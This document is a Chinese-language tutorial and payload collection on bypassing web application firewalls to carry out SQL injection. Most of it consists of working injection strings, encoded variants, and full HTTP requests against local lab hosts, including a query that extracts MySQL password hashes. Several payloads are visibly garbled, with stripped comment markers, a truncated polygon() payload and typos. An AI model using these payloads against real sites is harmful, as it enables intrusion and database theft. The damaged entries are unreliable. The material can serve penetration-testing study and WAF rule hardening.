SQL 注入绕过技术 已经是一个老生常谈的内容了,防注入可以使用某些云 waf加速乐等安全产品,这些产品会自带 waf 属性拦截和抵御 SQL 注入,也有一些产品会在服务器里安装软件,例如 iis 安全狗、d 盾、还有就是在程序里对输入参数进行过滤和拦截 例如 360webscan 脚本等只要参数传入的时候就会进行检测,检测到有危害语句就会拦截。SQL 注入绕过的技术也有许多。但是在日渐成熟的 waf 产品面前,因为 waf 产品的规则越来越完善,所以防御就会越来越高,安全系统也跟着提高,对渗透测试而言,测试的难度就越来越高了。接下来将会详细介绍针对 waf 的拦截注入的绕过方法
两个空格代替一个空格,用 Tab 代替空格,%a0=空格
%20 %09 %0a %0b %0c %0d %a0 %00 // /!/
select * from users where id=1 /!union//!select/1,2,3,4;
%09 TAB 键(水平)
%0a 新建一行
%0c 新的一页
%0d return 功能
%0b TAB 键(垂直)
%a0 空格
可以将空格字符替换成注释 // 还可以使用 /!这里的根据 mysql 版本的内容
不注释/
将字符串设置为大小写,例如 and 1=1 转成 AND 1=1 AnD 1=1
select * from users where id=1 UNION SELECT 1,2,3,4; select * from users where id=1 UniON SelECT 1,2,3,4;
过滤空格可以用%0 代替 也过滤# – 注释 用字符串匹配
select * from users where id=8E0union select 1,2,3,4; select * from users where id=8.0union select 1,2,3,4;
select \N; #代表 null select * from users where id=\Nunion select 1,2,3,\N; select * from users where id=\Nunion select 1,2,3,\Nfrom users;
如果 waf 拦截过滤单引号的时候,可以使用双引号 在 mysql 里也可以用双引号
作为字符串。
select * from users where id='1'; select * from users where id="1";
也可以将字符串转换成 16 进制 再进行查询。
select hex('admin'); select * from users where username='admin'; select * from users where username=0x61646D696E;
如果 gpc 开启了,但是注入点是整形 也可以用 hex 十六进制进行绕过
select * from users where id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='users' limit 1),4; select * from users where id=-1 union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_NAME=0x7573657273 limit 1),4;
可以看到存在整型注入的时候 没有用到单引号 所以可以注入。
可以看到可以把列 usrs 的字段全部查询出来。
以下两条查询语句,执行的结果是一致的,但是有些 waf 的拦截规则 并不会拦
截[库名].[表名]这种模式。
select * from users where id=-1 union select 1,2,3,4 from users; select * from users where id=-1 union select 1,2,3,4 from mysql.users;
mysql 中也可以添加库名查询表。例如跨库查询 mysql 库里的 usrs 表的内容。
select * from users where id=-1 union select 1,2,3,concat(user,authentication_string) from mysql.user;
在 mysql 查询可以使用 distinct 去除查询的重复值。可以利用这点突破 waf 拦截
select * from users where id=-1 union distinct select 1,2,3,4 from users; select * from users where id=-1 union distinct select 1,2,3,version() from users;
在 mysql 可以使用 这里是反引号
绕过一些 waf 拦截。字段可以加反引号或者
不加,意义相同。
insert into users(username,password,email)values('mysql','123456','admin@mysql.com'); insert into users(`username`,`password`,`email`)values('mysql','123456','admin@mysql.com');
在 php 语言中 id=1&id=2 后面的值会自动覆盖前面的值,不同的语言有不同的
特性。可以利用这点绕过一些 waf 的拦截。
id=1%00&id=2 union select 1,2,3
有些 waf 回去匹配第一个 id 参数 1%00 %00 是截断字符,waf 会自动截断 从而
不会检测后面的内容。到了程序中 id 就是等于 id=2 union select 1,2,3 从绕过注
入拦截。
目前有些防注入脚本都会逗号进行拦截,例如常规注入中必须包含逗号
select * from users where id=1 union select 1,2,3,4;
一般会对逗号过滤成空 select * from users where id=1 union select 1 2 3 4;这样
SQL 语句就会出错。所以 可以不使用逗号进行 SQL 注入。
select(substr(database() from 1 for 1));
#查询当前库第一个字符
查询 m 等于 select(substr(database() from 1 for 1))页面返回正常
select * from users where id=1 and 'm'=(select(substr(database() from 1 for 1)));
可以进一步优化 m 换成 hex 0x6D 这样就避免了单引号
select * from users where id=1 and 0x6D=(select(substr(database() from 1 for 1)));
这个 min 函数跟 substr 函数功能相同 如果 substr 函数被拦截或者过滤可以使用
这个函数代替。
select mid(database() from 1 for 1); #这个方法如上。 select * from users where id=1 and 'm'=(select(mid(database() from 1 for 1))); select * from users where id=1 and 0x6D=(select(mid(database() from 1 for 1)));
使用 join 自连接两个表
union select 1,2 #等价于 union select * from (select 1)a join (select 2)b
a 和 b 分别是表的别名
select * from users where id=-1 union select 1,2,3,4; select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select 3)c join(select 4)d; select * from users where id=-1 union select * from (select 1)a join (select 2)b join(select user())c join(select 4)d;
可以看到这里也没有使用逗号,从而绕过 waf 对逗号的拦截。
使用 like 模糊查询 select user() like ‘%r%’; 模糊查询成功返回 1 否则返回 0
找到第一个字符后继续进行下一个字符匹配。从而找到所有的字符串 最后就是
要查询的内容,这种 SQL 注入语句也不会存在逗号。从而绕过 waf 拦截。
SQL 注入时,如果需要限定条目可以使用 limit 0,1 限定返回条目的数目 limit 0,1
返回条一条记录 如果对逗号进行拦截时,可以使用 limit 1 默认返回第一条数
据。也可以使用 limit 1 offset 0 从零开始返回第一条记录,这样就绕过 waf 拦截
了。
目前主流的 waf 都会对 id=1 and 1=2、id=1 or 1=2、id=0 or 1=2
id=0 xor 1=1 limit 1 、id=1 xor 1=2
对这些常见的 SQL 注入检测语句进行拦截。像 and 这些还有字符代替
字符如下
and 等于&&
or 等于 ||
not 等于 !
xor 等于|
所以可以转换成这样
id=1 and 1=1 等于 id=1 && 1=1
id=1 and 1=2 等于 id=1 && 1=2
id=1 or 1=1 等于 id=1 || 1=1
id=0 or 1=0 等于 id=0 || 1=0
可以绕过一些 waf 拦截继续对注入点进行安全检测
也可以使用运算符号
id=1 && 2=1+1
id=1 && 2=1-1
许多 waf 会对 union select 进行拦截 而且通常比较变态,那么可以不使用联合查
询注入,可以使用字符截取对比法,进行突破。
select substring(user(),1,1); select * from users where id=1 and substring(user(),1,1)='r'; select * from users where id=1 and ascii(substring(user(),1,1))=114;
最好把’r’换成成 ascii 码 如果开启 gpc int 注入就不能用了。
可以看到构造得 SQL 攻击语句没有使用联合查询(union select)也可以把数据查
询出来。
如果程序会对=进行拦截 可以使用 like rlike regexp 或者使用<或者>
select * from users where id=1 and ascii(substring(user(),1,1))<115; select * from users where id=1 and ascii(substring(user(),1,1))>115; select * from users where id=1 and (select substring(user(),1,1)like 'r%'); select * from users where id=1 and (select substring(user(),1,1)rlike 'r'); select * from users where id=1 and 1=(select user() regexp '^r'); select * from users where id=1 and 1=(select user() regexp '^a');
regexp 后面是正则
有些程序会对单词 union、 select 进行转空 但是只会转一次这样会留下安全隐
患。
双关键字绕过(若删除掉第一个匹配的 union 就能绕过)
id=-1'UNIunionONSeLselectECT1,2,3--+
到数据库里执行会变成 id=-1’UNION SeLECT1,2,3–+ 从而绕过注入拦截。
有些程序会解析二次编码,造成 SQL 注入,因为 url 两次编码过后,waf 是不会
拦截的。
-1 union select 1,2,3,4#
第一次转码
%2d%31%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%31%2c%32
%2c%33%2c%34%23
第二次转码
%25%32%64%25%33%31%25%32%30%25%37%35%25%36%65%25%36%39%2
5%36%66%25%36%65%25%32%30%25%37%33%25%36%35%25%36%63%25%
36%35%25%36%33%25%37%34%25%32%30%25%33%31%25%32%63%25%33
%32%25%32%63%25%33%33%25%32%63%25%33%34%25%32%33
二次编码注入漏洞分析 在源代码中已经开启了 gpc 对特殊字符进行转义代码里有 urldecode 这个函数是对字符 url 解码,因为两次编码 GPC 是不会过滤的,所以可以绕过 gpc 字符转义,这样也就绕过了 waf 的拦截。
多余多个参数拼接到同一条 SQL 语句中,可以将注入语句分割插入。
例如请求 get 参数
a=[input1]&b=[input2] 可以将参数 a 和 b 拼接在 SQL 语句中。
在程序代码中看到两个可控的参数,但是使用 union select 会被 waf 拦截
那么可以使用参数拆份请求绕过 waf 拦截
-1’union/&username=/select 1,user(),3,4–+
两个参数的值可以控,分解 SQL 注入关键字 可以组合一些 SQL 注入语句突破
waf 拦截。
使用生僻函数替代常见的函数,例如在报错注入中使用 polygon()函数替换常用
的 updatexml()函数
select polygon((select * from (select * from (select @@version)
一、什么是 chunked 编码?
分块传输编码(Chunked transfer encoding)是只在 HTTP 协议 1.1 版本(HTTP/1.1)
中提供的一种数据传送机制。以往 HTTP 的应答中数据是整个一起发送的,并在
应答头里 Content-Length 字段标识了数据的长度,以便客户端知道应答消息的结
束。
传统的 Content-length 解决方案:计算实体长度,并通过头部告诉对方。浏览器
可以通过 Content-Length 的长度信息,判断出响应实体已结束
Content-length 面临的问题:由于 Content-Length 字段必须真实反映实体长度,
但是对于动态生成的内容来说,在内容创建完之前,长度是不可知的。
这时候要想准确获取长度,只能开一个足够大的 buffer,等内容全部生成好再计
算。这样做一方面需要更大的内存开销,另一方面也会让客户端等更久。
我们需要一个新的机制:不依赖头部的长度信息,也能知道实体的边界——分块
编码(Transfer-Encoding: chunked)。
对于动态生成的应答内容来说,内容在未生成完成前总长度是不可知的。因此需
要先缓存生成的内容,再计算总长度填充到 Content-Length,再发送整个数据内
容。这样显得不太灵活,而使用分块编码则能得到改观。
分块传输编码允许服务器在最后发送消息头字段。例如在头中添加散列签名。对
于压缩传输传输而言,可以一边压缩一边传输。
二、如何使用 chunked 编码
如果在 http 的消息头里 Transfer-Encoding 为 chunked,那么就是使用此种编码方
式。
接下来会发送数量未知的块,每一个块的开头都有一个十六进制的数,表明这个
块的大小,然后接 CRLF("\r\n")。然后是数据本身,数据结束后,还会有
CRLF("\r\n")两个字符。有一些实现中,块大小的十六进制数和 CRLF 之间可以
有空格。
最后一块的块大小为 0,表明数据发送结束。最后一块不再包含任何数据,但是
可以发送可选的尾部,包括消息头字段。
消息最后以 CRLF 结尾。
在头部加入 Transfer-Encoding: chunked 之后,就代表这个报文采用了分块编码。
这时,报文中的实体需要改为用一系列分块来传输。
分块传输 使用
每个分块包含十六进制的长度值和数据,长度值独占一行,长度不包括它结尾的
CRLF(\r\n),也不包括分块数据结尾的 CRLF(\r\n)。
最后一个分块长度值必须为 0,对应的分块数据没有内容,表示实体结束。
例:
HTTP/1.1 200 OK
Content-Type: text/plain
Transfer-Encoding: chunked
23\r\n
This is the data in the first chunk\r\n
1A\r\n
and this is the second one\r\n
3\r\n
con\r\n
8\r\n
sequence\r\n
0\r\n
\r\n
用 burpsuite 抓包提交分析 首先原生包 id=1&submit=1 查询到用户 id 为 1 的值
使用分块传输 首先在 http 头加上 Transfer-Encoding: chunked 表示分块传输传
送
第一行是长度 第二行是字符串 0 表示传输结束 后面跟上两个空格。
也可以使用 burpsuite 的插件 chunked-coding-converter 进行编码提交
将 SQL 注入攻击语句用区块传输编码转换后提交成功获取数据库用户信息。
有些 WAF 会自带一些文件白名单,对于白名单 waf 不会拦截任何操作,所以可
以利用这个特点,可以试试白名单绕过。
白名单通常有目录
/admin
/phpmyadmin
/admin.php
http://192.168.0.115/06/vul/sqli/sqli_str.php?a=/admin.php&name=vince+&submit=1 http://192.168.0.165/06/vul/sqli/sqli_str.php/phpmyadmin?name=%27%20union%20select%201,user()--+&submit=1
除了白名单信任文件和目录外,还有一部分 waf 并不会对静态文件进行拦截。
例如 图片文件 jpg 、png 、gif 或者 css 、js 会对这些静态文件的操作不会
进行检测从而绕过 waf 拦截。
/1.jpg&name=vince+&submit=1
/1.jpg=/1.jpg&name=vince+&submit=1
/1.css=/1.css&name=vince+&submit=1
http 协议是由 tcp 协议封装而来,当浏览器发起一个 http 请求时,浏览器先和服
务器建立起连接 tcp 连接,然后发送 http 数据包(即我们用 burpsuite 截获的数据),
其中包含了一个 Connection 字段,一般值为 close,apache 等容器根据这个字段
决定是保持该 tcp 连接或是断开。当发送的内容太大,超过一个 http 包容量,需
要分多次发送时,值会变成 keep-alive,即本次发起的 http 请求所建立的 tcp 连
接不断开,直到所发送内容结束 Connection 为 close 为止
用 burpsuite 抓包提交 复制整个包信息放在第一个包最后,把第一个包 close 改
成 keep-alive 把 brupsuite 自动更新 Content-Length 勾去掉。
第一个包参数的字符要加上长度接着提交即可。有些 waf 会匹配第二个包的正属
于正常参数,不会对第一个包的参数进行检测,这样就可以绕过一些 waf
在 http 头里的 Content-Type 提交表单支持三种协议
application/x-www-form-urlencoded 编码模式 post 提交
multipart/form-data 文件上传模式
text/plain 文本模式
文件头的属性 是传输前对提交的数据进行编码发送到服务器。
其中 multipart/form-data 表示该数据被编码为一条消息,页上的每个控件对应消
息中的一个部分。所以,当 waf 没有规则匹配该协议传输的数据时可被绕过。
Content-Type: multipart/form-data;
boundary=---------------------------28566904301101419271642457175
boundary 这是用来匹配的值
Content-Disposition: form-data; name=“id” 这也能作为 post 提交
所以程序会接收到构造的 SQL 注入语句-1 union select
当 order by 被过滤时,无法猜解字段数,此时可以使用 into 变量名进行代替。
select * from users where id=1 into @a,@b,@c,@d;
waf 在对危险字符进行检测的时候,分别为 post 请求和 get 请求设定了不同的匹
配规则,请求被拦截,变换请求方式有几率能绕过检测。如果程序中能同时接收
get、post 如果 waf 只对 get 进行匹配拦截,没有对 post 进行拦截。
<?php echo $_REQUEST['id']; ?>
有些 waf 只要存在 GET 或者 POST 优先匹配 POST 从而导致被绕过。
有些程序是 json 提交参数,程序也是 json 接收再拼接到 SQL 执行 json 格式通
常不会被拦截。所以可以绕过 waf
POST /06/vul/sqli/sqli_id.php HTTP/1.1 Host: 192.168.0.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type:application/json Content-Length: 38 Origin: http://192.168.0.115 Connection: close Referer: http://192.168.0.115/06/vul/sqli/sqli_id.php Cookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0 Upgrade-Insecure-Requests: 1 {'id':1 union select 1,2,3,'submit':1}
同样 text/xml 也不会被拦截
可以使用 select 0xA 运行一些字符从绕突破一些 waf 拦截
id=1 and (select 1)=(select 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA)/*!unio n*//*!select*/1,user()
post 编码
1+and+(select+1)%3d(select+0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAA)/*!union*//*!select*/1,user()&submit=1
POST /06/vul/sqli/sqli_id.php HTTP/1.1 Host: 192.168.0.165 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 99 Origin: http://192.168.0.165 Connection: close Referer: http://192.168.0.165/06/vul/sqli/sqli_id.php Cookie: PHPSESSID=hk8r159en71pndlu3jvvphenn5 Upgrade-Insecure-Requests: 1 id=1+and+(select+1)and+(select+0xA*1000)/*!union*//*!select*/+1,user()--+&submit=%E6%9F%A5%E8%AF %A2
select 1,2 union select{x 1},user()
花括号 左边是注释的内容 这样可以一些 waf 的拦截
去掉重复值
select 1,2 from users where user_id=1 union DISTINCT select 1,2 select 1,2 from users where user_id=1 union select DISTINCT 1,2
显示全部
select 1,2 from users where user_id=1 union all select 1,2 select 1,2 from users where user_id=1 union select all 1,2
目前很多 waf 都会对 union select 进行过滤的 因为使用联合查询 这两个关键词
是必须的,一般过滤这个两个字符 想用联合查询就很难了。
可以使用换行 加上一些注释符进行绕过。
也可以进行编码
原理:形式:“%”加上 ASCII 码(先将字符转换为两位 ASCII 码,再转为 16 进
制),其中加号“+”在 URL 编码中和“%20”表示一样,均为空格。
当遇到非 ASCII 码表示的字符时,如中文,浏览器或通过编写 URLEncode,根
据 UTF-8、GBK 等编码 16 进制形式,进行转换。如“春”的 UTF-8 编码为 E6 98
A5,因此其在支持 UTF-8 的情况下,URL 编码为%E6%98%A5。值得注意的是
采取不同的中文编码,会有不同的 URL 编码。
在 URL 传递到后台时,首先 web 容器会自动先对 URL 进行解析。容器解码时,
会根据设置(如 jsp 中,会使用 request.setCharacterEncoding(“UTF-8”)),采用
UTF-8 或 GBK 等其中一种编码进行解析。这时,程序无需自己再次解码,便可
以获取参数(如使用 request.getParameter(paramName))。
但是,有时从客户端提交的 URL 无法确定是何种编码,如果服务器选择的编码
方式不匹配,则会造成中文乱码。为了解决这个问题,便出现了二次 URLEncode
的 方 法 。 在 客 户 端 对 URL 进 行 两 次 URLEncode , 这 样 类 似 上 文 提 到
的%E6%98%A5 则会编码为%25e6%2598%25a5,为纯 ASCII 码。Web 容器在接
到 URL 后,自动解析一次,因为不管容器使用何种编码进行解析,都支持 ASCII
码,不会出错。然后在通过编写程序对容器解析后的参数进行解码,便可正确得
到参数。在这里,客户端的第一次编码,以及服务端的第二次解码,均是由程序
员自己设定的,是可控的,可知的。
绕过:
有些 waf 并未对参数进行解码,而后面程序处理业务时会进行解码,因此可以通
过二次 url 编码绕过。例如:
除了可以把全部字符转换也可以单独转换字符
编码绕过在绕 waf 中也是经常遇到的,通常 waf 只坚持他所识别的编码,比如说
它只识别 utf-8 的字符,但是服务器可以识别比 utf-8 更多的编码。
那么我们只需要将 payload 按照 waf 识别不了但是服务器可以解析识别的编码格
式即可绕过。
比如请求包中我们可以更改Content-Type中的charset的参数值,我们改为ibm037
这个协议编码,有些服务器是支持的。payload 改成这个协议格式就行了。
POST /06/vul/sqli/sqli_id.php HTTP/1.1 Host: 192.168.0.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded;charset:ibm037 Content-Length: 33 Connection: close Cookie: PHPSESSID=e6sa76lft65q3fd25bilbc49v3; security_level=0 Upgrade-Insecure-Requests: 1 %89%84=%F1&%A2%A4%82%94%89%A3=%F1
透过 Content-Type 的 charset 绕过 waf#
未编码
id=123&pass=pass%3d1
透过 IBM037 编码
%89%84=%F1%F2%F3&%97%81%A2%A2=%97%81%A2%A2~%F1
在提交的 http header
Content-Type: application/x-www-form-urlencoded; charset=ibm037
import urllib.parse
s = ‘id=-1 union select 1,user()-- &submit=1’
ens=urllib.parse.quote(s.encode(‘ibm037’))
print(ens)
在 iis 里会自动把 url 编码转换成字符串传到程序中执行。
例如 union select 可以转换成 u%6eion s%65lect
POST /06/vul/sqli/sqli_id.php HTTP/1.1 Host: 192.168.0.165 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 47 Origin: http://192.168.0.165 Connection: close Referer: http://192.168.0.165/06/vul/sqli/sqli_id.php Cookie: PHPSESSID=hk8r159en71pndlu3jvvphenn5 Upgrade-Insecure-Requests: 1 id=-1 union%25OAselect%25OA1,user()-- &submit=1
形式:“\u”或者是“%u”加上 4 位 16 进制 Unicode 码值。
iis 会自动进行识别这种编码 有部分 waf 并不会拦截这这种编码
-1 union select 1,user()
部分转码
-1 uni%u006fn sel%u0065ct 1,user()
全部转码
%u002d%u0031%u0020%u0075%u006e%u0069%u006f%u006e%u0020%u0073%u
0065%u006c%u0065%u0063%u0074%u0020%u0031%u002c%u0075%u0073%u00
65%u0072%u0028%u0029
目前不少 waf 都会使用都会对 union select 进行拦截 单个不拦截 一起就进行拦
截。
针对单个关键词绕过
sel<>ect 程序过滤<>为空 脚本处理
sele//ct 程序过滤//为空
/!%53eLEct/ url 编码与内联注释
se%0blect 使用空格绕过
sele%ct 使用百分号绕过
%53eLEct 编码绕过
大小写
uNIoN sELecT 1,2
union all select 1,2
union DISTINCT select 1,2
null+UNION+SELECT+1,2
/!union//!select/1,2
union//select//1,2
and(select 1)=(Select 0xA1000)/!uNIOn*//!SeLECt/ 1,user()
/!50000union//!50000select/1,2
/!40000union//!40000select/1,2
%0aunion%0aselect 1,2
%250aunion%250aselect 1,2
%09union%09select 1,2
%0caunion%0cselect 1,2
%0daunion%0dselect 1,2
%0baunion%0bselect 1,2
%0d%0aunion%0d%0aselect 1,2
–+%0d%0aunion–+%0d%0aselect–+%0d%0a1,–+%0d%0a2
/!12345union//!12345select/1,2;
/中文/union/中文/select/中文/1,2;
/* /union/ /select/ /1,2;
/!union//!00000all//!00000select/1,2